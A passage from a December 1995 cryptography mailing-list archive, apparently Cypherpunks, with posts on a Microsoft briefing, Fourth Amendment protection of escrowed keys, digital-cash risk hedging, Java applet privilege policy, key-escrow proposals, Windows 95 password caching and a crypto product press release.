(fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From joelm at eskimo.com Thu Dec 7 18:04:10 1995 From: joelm at eskimo.com (Joel McNamara) Date: Thu, 7 Dec 95 18:04:10 PST Subject: Micro$oft and Java Message-ID: <199512080205.SAA02898@mail.eskimo.com> I was at the Microsoft presentation. Crypto-relevant info: A patch will be published in the next few days to address the weak .PWL encryption. I got a rather lame excuse about how the encryption was first implemented in 1991, and how it was sufficient then. They will supposedly be changing the seed. I asked about what MS was doing in regard to future strong crypto. Got an interesting response in that that "the government was going to let them implement 768 bit keys." I later asked an MS person if these were RSA session keys or what. He said yes, but I really don't think he knew what he was talking about based on some of his other comments. Visual Basic Script will be MS's response to JavaScript. The interesting thing here is a plan to use digital signatures on controls and scripts as a means of authentication. The comment was made "you'd trust something signed by Lotus or some other big name, but you probably wouldn't be that trustful of a piece of shareware." Hmmm... MS will be releasing a "safe" runtime version of Visual Basic that will supposedly prevent nasty virii and trojan horses from being implemented on Web pages. IMHO, Perry's previous comments on the security of Java apply. Servers and some clients will support end-to-end encryption. No details... I didn't ask about GAK. Bill said there was a white paper explaining Microsoft's position on encryption. Maybe I'll test the search capabilities of the MS Web site later tonight. Overall, the presentation was interesting (but obviously lacking in technical details as the audience was mostly press). MS is going to throw a lot of resources at this in order to maintain its industry dominance. Thought for the day. Bill on the relevance of the briefing being held on Pearl Harbor day quoted Admiral Yamamoto after the 1941 attack, "we have awoken a sleeping giant." Draw your own conclusions on that one... Joel From unicorn at schloss.li Thu Dec 7 18:16:24 1995 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 7 Dec 95 18:16:24 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Thu, 7 Dec 1995, Timothy C. May wrote: > At 9:27 PM 12/7/95, cme at acm.org wrote: > > >It could be even worse. I was on a panel last year with Scott Charney (sp?) > >(I believe from DoJ) during which he commented that if you give your secret > >key to anyone -- e.g., your own company -- then you have given up the > >presumption of privacy. That leaves the police open to get that secret > >without a warrant. This claim should be checked by a real lawyer. > > Huh? > > You mean if you give me your key the police can get it from me without a > warrant? What if I don't want to give it up, and you don't? How would the > police get it without a warrant? Yes. Unless it could be shown there their was an expactation of privacy in the transfer, or that there was an understanding that you intended this to be a confidential matter. Or in the alternative, that the relationship between you and the third party is suggestive of such a confidence on its face. Remember this is a ex post ruling. The police will just come in and take the information, you have to fight it AFTER the fact. It sounds fine in e-mail to ask the question "How will they get in" but in real life it becomes a much less realistic proposition. > (And "I" could be your employer, so the point is clear.) Yes. I have seen holdings which indicate that information given to an employer, where there was no obvious expection that it be kept confidential, estopped 4th amendment protections to its introduction when obtained without a warrant. > And even more strikingly, what if you give your private key to your lawyer > for safekeeping? Has attorney-client privilege gone away? Hardly. See above. It hinges on the nature of the relationship and how it bears on the expectation of privacy. The supreme court has ruled that the relationship with the phone company does not meet such a standard, and one can assume ISP's apply the same way. I could go on spilling out holdings if there is enough interest. > (Granted, there are ways to break attorney-client privilege, but these are > rare exceptions. In any case, the police could not get the private key > without a court order, warrant, whatever.) Again, because of the nature of the relationship. There is an expectation that a conversation with an attorney is one of the most private exchanges you can engage in. As for rare exceptions, I'm not so sure I would term them rare. > I can believe that some cases of giving up keys wipes out one's arguments > based strictly on "privacy," but not that it wipes out other arguments. It essentially prevents you from claiming you really had a demonstrated privacy interest in it, unless there are other circumstances to indicate such an interest. Think of the court as saying "How the hell is this private if you told maggy and fred?" > It seems to me that if one wants to voluntarily escrow private keys, for > safekeeping, one's personal lawyer is a safe bet: it is very difficult to > break this kind of attorney-client confidentiality, from what I know of > such things. I don't know where you came up with the lawyer example. I don't know that anyone was claiming that one could break the attorney client trust on this basis. However, I think, as a tangential matter, a court will examine very closely a claim that keys protected by such a trust can not be used as evidence. To hold this so broadly would be to tell the criminal he merely needs to give the weapon used in a crime to his attorney to prevent its introduction. You also need to make a distinction between a 4th amendment matter (which is the issue at hand) and the seperate and distinct protection of the attorney client relationship. "A person has no legitimate expectation of privacy in information he voluntarily turns over to third parites." _Smith v. Maryland_, 442 U.S. 735 (1979); _California v. Greenwood_, 486 U.S. 35 (citing Smith) (1988). > --Tim May > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From dwwillia at cet.co.jp Thu Dec 7 18:31:00 1995 From: dwwillia at cet.co.jp (David Williams) Date: Thu, 7 Dec 95 18:31:00 PST Subject: Micro$oft and Java In-Reply-To: <199512080205.SAA02898@mail.eskimo.com> Message-ID: <199512080231.CAA08012@parkplace.cet.co.jp> Another interesting post. The list is really heavy. I end up killing most of the articles. There are some real gems in there though. >>>>> "Joel" == Joel McNamara writes: Joel> I was at the Microsoft presentation. Crypto-relevant info: Joel> A patch will be published in the next few days to address Joel> the weak .PWL encryption. I got a rather lame excuse about Joel> how the encryption was first implemented in 1991, and how it Joel> was sufficient then. They will supposedly be changing the Joel> seed. Joel> I asked about what MS was doing in regard to future strong Joel> crypto. Got an interesting response in that that "the Joel> government was going to let them implement 768 bit keys." I Joel> later asked an MS person if these were RSA session keys or Joel> what. He said yes, but I really don't think he knew what he Joel> was talking about based on some of his other comments. Joel> Visual Basic Script will be MS's response to JavaScript. Joel> The interesting thing here is a plan to use digital Joel> signatures on controls and scripts as a means of Joel> authentication. The comment was made "you'd trust something Joel> signed by Lotus or some other big name, but you probably Joel> wouldn't be that trustful of a piece of shareware." Hmmm... Joel> MS will be releasing a "safe" runtime version of Visual Joel> Basic that will supposedly prevent nasty virii and trojan Joel> horses from being implemented on Web pages. IMHO, Perry's Joel> previous comments on the security of Java apply. Joel> Servers and some clients will support end-to-end encryption. Joel> No details... Joel> I didn't ask about GAK. Bill said there was a white paper Joel> explaining Microsoft's position on encryption. Maybe I'll Joel> test the search capabilities of the MS Web site later Joel> tonight. Joel> Overall, the presentation was interesting (but obviously Joel> lacking in technical details as the audience was mostly Joel> press). MS is going to throw a lot of resources at this in Joel> order to maintain its industry dominance. Joel> Thought for the day. Bill on the relevance of the briefing Joel> being held on Pearl Harbor day quoted Admiral Yamamoto after Joel> the 1941 attack, "we have awoken a sleeping giant." Draw Joel> your own conclusions on that one... Joel> Joel Joel> -- David Wayne Williams dwwillia at cet.co.jp Software Engineer http://www.cet.co.jp Catena Enterprise Technologies Linux, PGP, the Web: I love this Net! From sameer at c2.org Thu Dec 7 18:31:50 1995 From: sameer at c2.org (sameer) Date: Thu, 7 Dec 95 18:31:50 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: <199512080227.SAA15534@infinity.c2.org> > > You mean if you give me your key the police can get it from me without a > > warrant? What if I don't want to give it up, and you don't? How would the > > police get it without a warrant? > > Yes. Unless it could be shown there their was an expactation of privacy > in the transfer, or that there was an understanding that you intended this > to be a confidential matter. Or in the alternative, that the I do not understand. Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells Bob "I want Alice's key, you need to give it to me. I don't have a warrant." How is this different from Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, you need to give it to me. I don't have a warrant." sheesh, what a fucked up legal system. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From dlv at bwalk.dm.com Thu Dec 7 18:43:12 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 7 Dec 95 18:43:12 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on El In-Reply-To: Message-ID: Nathaniel Borenstein writes: > Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E. > ALLEN SMITH"@mbcl.ru (1656) > > > The risk in question is not infinite-cost. If the person who gets > > ahold of the keys starts simply making lots and lots of money, in a free > > market the prices in digital cash for everything will start going up. This > > phenomenon will be spotted, and those taking the particular variety in > > question will stop accepting it. Losses are limited to however much was out > > there at a given time, and if there are multiple systems with free-market > > interconversion between them, that may not be very much. People will move > > out of a decaying monetary system if: A. the new system is as easy to get > > as the old; and B. the new system is as easy to spend as the old. > > If the person who gets the keys simply uses them on a small scale, > > then the resulting inflation and loss of value can simply be dealt with > > using the discount mechanism. It's no longer infinite risk. > > Basically, the criminal in this scenario has a choice between greed and > vandalism. If he's motivated by greed, and he's clever, he'll push > things slowly in the inflationary direction, as you describe. If he's a > vandal or terrorist at heart, however, he might get more satisfaction > out of generating the equivalent of overnight inflation at the > billion-percent level. That's not a decaying monetary system, it's a > suddenly-collapsing monetary system. The only difference between those > two scenarios is the quantity of bad money the criminal chooses to print > and distribute. (Note that this is very different from physical > counterfeiting, where the logistics of actually feeding trillions of > dollars into the money supply are quite daunting, and make the > catastrophic-vandal scenario more or less impossible.) A few rambling thoughts on the same subject: I see a couple of risks that a potential customer would consider (akin to the risks of owning a real-world exotic currency): 1. The risk that she'll accumulate some electronic money and won't be able to exchange it conveniently for something else (goods, services, other forms of money). Imagine holding a quanitity of central-african francs or belarusian zaichiks in a rural area in American Midwest. This currency may be worth a lot in some geographical areas (like New York City), but no bank will take it in the accursed fly-over :). (Someone I know brought back some sheqels from a trip to Israel and had lots of trouble finding a bank willing to exchange those for US dollars.) Likewise if your interner connection suddently goes under, you may not be able to trade your electronic cash until it's restored. 2. The risk that the electronic money will lose its value, e.g., because someone issues a lot of it. In real life, this is comparable to the situation where you own, e.g., a pile Mexican pesos, and the government of Mexico decides to print a lot of pesos, while changing the exchange rate so now you can get more pesos for a dollar than you could when you got your original pile. Hence, your pile is worth fewer dollars than it did before. In real world, gold, silver, beads, fishhooks, whale teeth, whiskey, seashells, cigarettes have all been used as money (medium of exchange / store of value) because the users could be certain of their scarcity. There's the risk that someone will find a way to forge electronic money so its exchange rate will fall. I see an entrepreneurial opportunity in these risks. I'm not necessarily going to do it myself, but perhaps someone will find this idea useful. First, let us recall how in real life currency owners limit their risks by hedging. A most common hedge is an option. Let's suppose that I hold $1M worth of DEMs, and can currently readily exchange them for USDs at, say, 1.40. I enter into a contract with, say, my good friend Alexplore, specifying 2 things: 1. I now pay Alexplore $1,000 (Hey, I'm making this up!!!) 2. At any time during the next 3 months I can give Alexplore my DEM's and he'll give me back USD's at, say, 1.35. (Of course, the contract specifies the maximum amount of DEM's I can force him to buy from me.) If the exchange rate never falls below 1.35 during the 3 months, I let the option expire and Alexplore keeps the money; my loss of $1000 is his gain. If the exchange rate does fall below 1.35, I'll probably excersice the option. My loss is limited to the change from 1.40 to 1.45; any further loss is Alexplore's (partially offset by the $1000). Alexplore is betting that the exchange rate won't hit 1.35; I'm just limiting my potential losses. In effect, Alexplore had sold me an insurance policy with a small deductible. Another an example familiar to most people is insuring one's car or a house. Suppose I own a house worth $200,000 (we actually don't) and buy a fire insurance for $1000. If the house doesn't burn down within a year, the insurance premium is my loss and the insurer's profit. If it does burn down, I probably have a claim against the insurer. Of course, there's an additional small risk that the insurance company will go under or renege on the contract. Moreover, the insurer can insist that, e.g., the house be inspected for fire code violations before the policy goes into effect. How then can this insurance of assets be emulated with electronic money? Well, an individual or an organization X that's fairly confident that electronic money is "safe" could offer offer the following contract: a money-holder Y pays X an sum of real or electronic money. During a fixed period of time Y may chooses to ask X to exchange some electronic money (up to a maximum amount based on the initial payment) for real money at an agreed-upon discounted rate. For example, Y might pay X $10 for the right to ask X to accept up to $1000 of (dollar-denominated) electronic money at the rate of 90c of "real" money per electronic dollar. The exchange rate is discounted so Y won't choose to exercise the option until there's a real problem with the money (a deductible of sorts); and the payment required to insure a certain amount of electronic money is negotiated based on X's and Y's perceptions of the risks involved. If electronic money works as well as many of us hope it will, then X just made $10 for nothing. But if the money goes bad, then X has assumed most of Y's risk. X may impose security conditions on Y; e.g., only insure the money that was received using an X-approved encryption. For added assurance, X should be independent from the organizations that now issue electronic money. X also has to convince Y's that he has the resources to satisfy the claims if the shit hits the fan. Keep in mind that X assumes a tremendous liability and hopes never to pay up. In the 80's many elderly investors essentially insured others against a sharp drop in the market. They were badly hurt during the crashes of 87 and 89. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From ddt at lsd.com Thu Dec 7 18:46:52 1995 From: ddt at lsd.com (Dave Del Torto) Date: Thu, 7 Dec 95 18:46:52 PST Subject: [FYI] FBI Training Eastern European Police Message-ID: At 8:22 PM 12/6/95, anonymous-remailer at shell.portal.com wrote: [elided] >I'm certain that the FBI and other law-enforcement officials might >also learn by living in a city where the East truly meets the West. > >Budapest is a beautiful old city of bridges, not just literally but >figuratively. It's where anyone in the world can find comfort. [much elided] Hey "Alice," This is a very persipicatious set of observations about Budapest, a city I lived/worked in for a while (you sound like you know it rather well yourself). The level of technical CS knowledge in Bp is comparable to, or better than, many other cities (except maybe for Moscow and St. Petersburg) in the former Bloc. Your comments also provide good insights into why it's technically and geographically important to cypherpunks: it's the petri disk for many of our cpunk brethren over there. The fact that the FBI has chosen Bp as one of their entry-points into the region impacts our policy discussions here, particularly since our LE types are making contact with the former secret police in that region, and especially so given the stationing of US Troops in Kaposvar as we type (southern Hungary) for easy entry into Bosnia. Anyone who attended CFP 95 may also remember some of Esther Dyson's lunchtime comments about the Russian mafia (which has a strong presence in Bp) and the growth of crypto's use both by the gangsters and LE officers. Some of the most powerful crypto may be emanating from these regions and it would be wise for us to try and track TLA activities in that area. I won't drag this topic out any further, but if anyone comes across similar info about our various TLAs operations over there, I hope they'll at least share it with me, if not the list. dave PS: I hope Perry's paying attention. ;) From mpd at netcom.com Thu Dec 7 18:48:39 1995 From: mpd at netcom.com (Mike Duvos) Date: Thu, 7 Dec 95 18:48:39 PST Subject: Anyone Remember socket.c? Message-ID: <199512080248.SAA29014@netcom2.netcom.com> Fellow 'Punks, A while back on the list, someone posted a very short C program called socket.c, which, when given a port number and an excutable, would fork off copies of a given application for anyone who connected to the port. I saved the program at the time, but seem to have deleted it. I realize it would be trivial to write, but don't want to have to look at nasty network #include files. If someone could either post it to the list again, or email me a copy, I will be eternally greatful. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From unicorn at schloss.li Thu Dec 7 18:49:03 1995 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 7 Dec 95 18:49:03 PST Subject: Is there a lawyer in the house? In-Reply-To: <199512080227.SAA15534@infinity.c2.org> Message-ID: On Thu, 7 Dec 1995, sameer wrote: > > > You mean if you give me your key the police can get it from me without a > > > warrant? What if I don't want to give it up, and you don't? How would the > > > police get it without a warrant? > > > > Yes. Unless it could be shown there their was an expactation of privacy > > in the transfer, or that there was an understanding that you intended this > > to be a confidential matter. Or in the alternative, that the > > I do not understand. > > Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells > Bob "I want Alice's key, you need to give it to me. I don't have a > warrant." > > How is this different from > Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, > you need to give it to me. I don't have a warrant." The real concern is this: Bob gives his key to alice. The cops walk into alice's place and 'convince' alice to turn the key over whithout a warant. Perhaps alice is more susceptible to persuasion because of some external reasons. Alice does, Bob has no privacy interest in the key, Bob can no longer argue that it is protected under the 4th amendment. Now let's get more sinister. The cops mysteriously 'find' the key somewhere without a warrant. Bob cannot argue that the key should be surpressed on the basis of the 4th amendment because he gave it to Alice, and thus clearly it's not information he was interested in protecting. (This is assuming the cops didn't violate other areas, or break into a house or something, or that if they did, that the court will find out about it). That's the rationale. > sheesh, what a fucked up legal system. Indeed. > sameer Voice: 510-601-9777 > Community ConneXion FAX: 510-601-9734 > The Internet Privacy Provider Dialin: 510-658-6376 > http://www.c2.org/ (or login as "guest") sameer at c2.org --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From adam at homeport.org Thu Dec 7 19:06:06 1995 From: adam at homeport.org (Adam Shostack) Date: Thu, 7 Dec 95 19:06:06 PST Subject: Java musings Message-ID: <199512080311.WAA02282@homeport.org> Some musings on policies, threats and liabilities of Java, Livescript and other downloadable applets. I. Policies. The recent Livescript problem was predictable. Building an execution environment to safely handle all the myriad of tricks that programmers will throw at it is not a simple or easy task. People will make mistakes in the design and execution of these environments. Right now, many people are chasing the idea of applets; its neat, sexy, and everyone wants in. But, for many users, and many environments, certain capabilities may be inappropriate. There has already been loud complaining in many forums about the lack of site configurable Certification authorities, lack of site control over Java features. A site needs to be able to decide who to trust, and who should be able to make these decisions, in a manner that a user can not easily override. The ease of configuration of trust parameters in Netscape is neat for personal use, but inappropriate for business. When Java gets its ability to check signatures, expect complaints about lack of site configuration of trust hierarchies. (Yes, as opposed to web of trust. As a bank, I want to be able to control what code can run with a very explicit hierarchy.) All applets are not created equal. All user requirements are not equal. Applets are not created equal. Some are created in house to do certain things, like watch the price of two stocks relative to one another. If an applet is created in house, signed off on by the InfoSec people, then there's no reason (assuming strong integrity checking) to deny it access to local disk, arbitrary network access, etc. However, for various reasons (notably compartmentalization, aka defense in depth), it is desirable to restrict disk (and possibly network) access to certain addresses. Something akin to chroot(), tagging of packets outside the applications control to make firewall filtering easy, filtering of available addresses to send to (only talk on local subnet). The ability to assign various levels of privilege to code that runs on a virtual machine will be essential. The ability to limit these privileges must be reserved in some way to those with site security responsibilities. The security people, in turn, will need the ability to delegate. This can perhaps be provided based on a least trusted basis. Code starts out in a small, tight environment, with no access to anything other than the (protected) processor, and a promote() function which does authorization checking before granting new levels of privileges in certain areas. Access to disk, access to local and remote network services, and the ability to pull the browser to a new URL are all privileges that should be orthogonally configurable, by site, by machine, or by applet. All user requirements are not equal. This should be obvious. Not all users need Java or Livescript. If a user is using Netscape to look at man pages, access to Java and livescript is not very important. Access to unsigned Java applets may or may not meet the site security policy. At home, I might happily look at them. In the office, I might have a very different approach. A bank teller might need access to applets developed by the bank for various things, but not need access to anything over the internet. He would need to be able to access the local lan servers. The need of users to get to different resources, and work under different levels of protection calls out for mandatory strong authentication in applets. In other words, a better design might be only execute applets with some (verified) signature attached to them. The language in which the applet was written is important. More important is the ability of users and management to set policies, and see those policies enforced by applications. I could then set my browser only to run Livescripts signed by someone I know (or an agency that vets them for bugs), and only run Java with minimal trust in the absence of signatures. II. Threats and liabilities A malicious applet, running amok on a machine, with the same disk & network access as a user, can send off to the world anything it thinks interesting. However, there are times when letting an applet at certain files, or giving it heavy network access, might be very useful. I'll take as an example Anderson Consulting's demo BargainFinder (http://bf.cstar.ac.com/bf/). BargainFinder is a way to search 9 music stores on the web for an album, with one form. 3 of the stores are blocking the searches. In addition, a cypherpunk might wonder if the searches and their origins are being logged. Thats not very useful for those of us who look forward to perfect marketplace information for consumer goods. Let me sketch BargainFinder2, as powered by Java. Instead of going to Anderson for the page, you download BF to your local machine. It does the searching, same as BF1 did, but with no blocking possible. You find your CD at the best price. Perhaps BF is rental-ware, perhaps its someone advertising their Java coding skills. But its clear that this applet needs to be able to access the network freely. Its also plain that it won't be written for 6 platforms. It might be written for Windows, but the Java market might be larger still, and thus more attractive. (Not to mention that the network interface is mostly taken care of. no Winsock version worries.) Other applets, say a Ecash wallet manager that interfaces with Quicken, needs access to your local disk, and needs to be able to respond to incoming network queries from shops. Granular control of the access that applets have thus seems to be needed. Making Java 'secure' is not enough, because people will 'turn off' all the security to make one applet work. It might also be interesting to consider automatically updating software, that can replace itself from time to time, after verifying that a signature is correct. Although, that does raise the value of stealing a key from some well known, trusted applet vendor. To summarize, 'security' in the vauge sense that Java promises, while useful, needs granularity to allow it to fulfill its potential. Comments are welcome. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From pfarrell at netcom.com Thu Dec 7 19:06:12 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Dec 95 19:06:12 PST Subject: GAK solutions was: Is there a lawyer in the house? Message-ID: <79623.pfarrell@netcom.com> In message Thu, 7 Dec 95 16:27:23 EST, cme at acm.org writes: > It could be even worse. I was on a panel last year with Scott Charney > (sp?) (I believe from DoJ) during which he commented that if you give > your secret key to anyone -- e.g., your own company -- then you have > given up the presumption of privacy. Interesting. At the NIST meeting, criteria #5 deals with decrypting a conversation with only the key from one end. I thought that would be hard to implement. But during the discussion, they called on Miles Smid [sp?] who was obviously a NIST employee/consultant with real knowledge. He suggested that you could encrypt the session key with the public key of both parties, and send it along. This would allow single ended GAK. This is not far from the idea that CME proposed that the NSA/FBI/CIA publish public keys, and we'll hack a voluntary version of PGP that encrypts the session key with the LEA public key -- instant voluntary Key Escrow. Miles Smid's idea seemed reasonable, until you realize that he intends you to escrow your private key... Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Thu Dec 7 19:17:54 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Dec 95 19:17:54 PST Subject: Is there a lawyer in the house? Message-ID: At 2:27 AM 12/8/95, sameer wrote: >> > You mean if you give me your key the police can get it from me without a >> > warrant? What if I don't want to give it up, and you don't? How would the >> > police get it without a warrant? >> >> Yes. Unless it could be shown there their was an expactation of privacy >> in the transfer, or that there was an understanding that you intended this >> to be a confidential matter. Or in the alternative, that the > > I do not understand. > >Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells >Bob "I want Alice's key, you need to give it to me. I don't have a >warrant." > >How is this different from >Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, >you need to give it to me. I don't have a warrant." > > > sheesh, what a fucked up legal system. ^^^^^^^^^ EXON WARNING! This message has just exposed the author, the toad.com system, and all those who pass it on to fines of not less than $10,000! But I share Sameer's confusion. If cops show up at my door, they must, it seems to me, present proper warrants before they can _enter_ my premises, or _search_ my premises. Something given to me, whether a letter, a key, a photo, etc., is essentially *my property* and may not simply be taken away from without due process. I hope Black Unicorn is incorrect in his point. --Tim Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cme at clark.net Thu Dec 7 19:24:21 1995 From: cme at clark.net (Carl Ellison) Date: Thu, 7 Dec 95 19:24:21 PST Subject: GAK solutions was: Is there a lawyer in the house? Message-ID: <199512080324.WAA22651@clark.net> [By the way, I know that my sig on that message was bogus. I made the mistake of editing the message after signing it and sent it before I stopped to think.] >Date: Thu, 07 Dec 1995 22:07:00 -0400 (EDT) >From: Pat Farrell >Subject: GAK solutions was: Is there a lawyer in the house? >Interesting. At the NIST meeting, criteria #5 deals with decrypting >a conversation with only the key from one end. > >I thought that would be hard to implement. But during the discussion, >they called on Miles Smid [sp?] who was obviously a NIST employee/consultant >with real knowledge. He suggested that you could encrypt the >session key with the public key of both parties, and send it along. >This would allow single ended GAK. Miles Smid is a NIST employee who is quite knowledgeable about crypto and Clipper. >This is not far from the idea that CME proposed that the NSA/FBI/CIA >publish public keys, and we'll hack a voluntary version of PGP that >encrypts the session key with the LEA public key -- instant >voluntary Key Escrow. I still think that's the only way the gov't will get GAK -- :) - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From llurch at networking.stanford.edu Thu Dec 7 19:31:26 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 7 Dec 95 19:31:26 PST Subject: Micro$oft and Java In-Reply-To: <199512080205.SAA02898@mail.eskimo.com> Message-ID: On Thu, 7 Dec 1995, Joel McNamara wrote: > I was at the Microsoft presentation. Crypto-relevant info: > > A patch will be published in the next few days to address the weak .PWL > encryption. I got a rather lame excuse about how the encryption was first > implemented in 1991, and how it was sufficient then. They will supposedly > be changing the seed. I do believe the word "lame" is in order, yes. Microsoft has issued a public statement on the "issue" at http://www.microsoft.com/windows/pr/password.htm As usual, the inaccuracies begin with the first sentence. Password caching is not optional. It is on by default. Instructions for turning it off are not even included with the floppy disk or OEM versions of Win95, and they're not easy to find in the Resource Kit help file on the install CD, which is neither installed nor referenced by default. Some rather astute people spent days looking for a way to disable password caching, and they couldn't find it. Their messages are on my list archive. There is currently *no way* for the administrator of a public Windows 95 lab to have any confidence that password caching has been turned off. All it takes is one malicious user -- or one innocent user who wants to disable system policies for other reasons -- and all passwords used from that machine are compromised. We started whining about this on November 1; see gopher://quixote.stanford.edu/1m/win95netbugs. -rich From fc at all.net Thu Dec 7 19:33:00 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 7 Dec 95 19:33:00 PST Subject: Strange Unix behavior dealing with utmp - anyone recognize this? Message-ID: <9512080330.AA27098@all.net> I was sending out a few hundred 25K emails over a period of a minute or so when my systemn encountered this thrilling sequence: Dec 7 22:11:56 all vmunix: file:<3>zs1: silo overflow Dec 7 22:11:57 all syslogd: /etc/utmp: File table overflow Dec 7 22:11:56 all vmunix: table is ful<3>zs1: silo overflow It appears to be some sort of file table overflow related to the syslog daemon. The message repeats numerous times and I think it has to do with the number of messages sent over a short time, however: I regularly send far more messages without this error It lost the processes that were generating these messages so I had to redo part of the mailing. Does anyone recognize the symptom, and does this open a potential for attack by stress? (e.g., if you can get something to fail in this way can the failure cause something to be missed?) Just thought I'd mention it. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From cme at clark.net Thu Dec 7 19:41:35 1995 From: cme at clark.net (Carl Ellison) Date: Thu, 7 Dec 95 19:41:35 PST Subject: GAK solutions was: Is there a lawyer in the house? Message-ID: <199512080342.WAA27745@clark.net> >>This is not far from the idea that CME proposed that the NSA/FBI/CIA >>publish public keys, and we'll hack a voluntary version of PGP that >>encrypts the session key with the LEA public key -- instant >>voluntary Key Escrow. > >I still think that's the only way the gov't will get GAK -- :) Actually, the real proposal (http://www.clark.net/pub/cme/html/no-ke.html) is to have them give me their public keys. I would sign and post them. The world's citizens would then add them to their public keyrings and, when they feel like volunteering GAK, would include these agencies as crypto-recipients -- on a per-message basis. No meetings -- no hassle -- nearly 0 cost -- and the gov't could have GAK tomorrow. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From ahupp at primenet.com Thu Dec 7 19:46:34 1995 From: ahupp at primenet.com (Adam Hupp) Date: Thu, 7 Dec 95 19:46:34 PST Subject: PGP Message-ID: <199512080347.UAA22206@usr1.primenet.com> Sorry...I was always taught that the user should not be mandated to finish the job of the programmer. Please, do not take me wrong, PGP is a remarkable tool...but I was not aware I had iron out the bugs. That part is the easiest to do compared with the genius of the program... but I still should not have to do it. This is not "ironing out bugs". It is configuring the program to run on your version of Unix. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa 2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6 x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+ =PtJK -----END PGP PUBLIC KEY BLOCK----- From rjc at clark.net Thu Dec 7 20:26:00 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 7 Dec 95 20:26:00 PST Subject: Netscape stock on 12/7/95 In-Reply-To: <9512072217.AA16206@toad.com> Message-ID: <199512080426.XAA06122@clark.net> > > 16% tumble today... > > ...is the word getting out? I don't think it is a coincidence that Microsoft also made their major announcements today. I doubt the feeding frenzy over Internet related stocks and technology is even close to over. Having seen the new Shockwave plugin for Netscape, I expect Macromedia stock to go up again soon. (it already went up 50% after the original Netscape announcement of Director integration) -Ray From mixmaster at remail.ecafe.org Thu Dec 7 20:32:18 1995 From: mixmaster at remail.ecafe.org (Ecafe Mixmaster Remailer) Date: Thu, 7 Dec 95 20:32:18 PST Subject: Oh Yeah? ipsecure Message-ID: <199512080435.EAA19138@pangaea.ang.ecafe.org> For Immediate Release Contact: National Semiconductor Lori Sinton (408) 721-2448 lori at ipower.nsc.com http://www.ipsecure.com CryptoSampler, from National Semiconductor, Demonstrates Ease of Building Secure Electronic Commerce and Communications Applications Company's iPower(tm) Business Unit Launches Free CryptoSolver to Inaugurate New Web Site SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor Corporation today announced the availability of its CryptoSampler package for applications developers interested in gaining a "hands on" understanding of how cryptography solves modern business problems. Developed by National's iPower Business Unit, the program consists of three demonstration applications and the PersonaCard(tm) 100, a hardware token for personal, portable data security. The package contains both the demonstration applications including "build-it- yourself" tools to integrate security easily into electronic commerce and communications applications. Priced at $129, the CryptoSampler 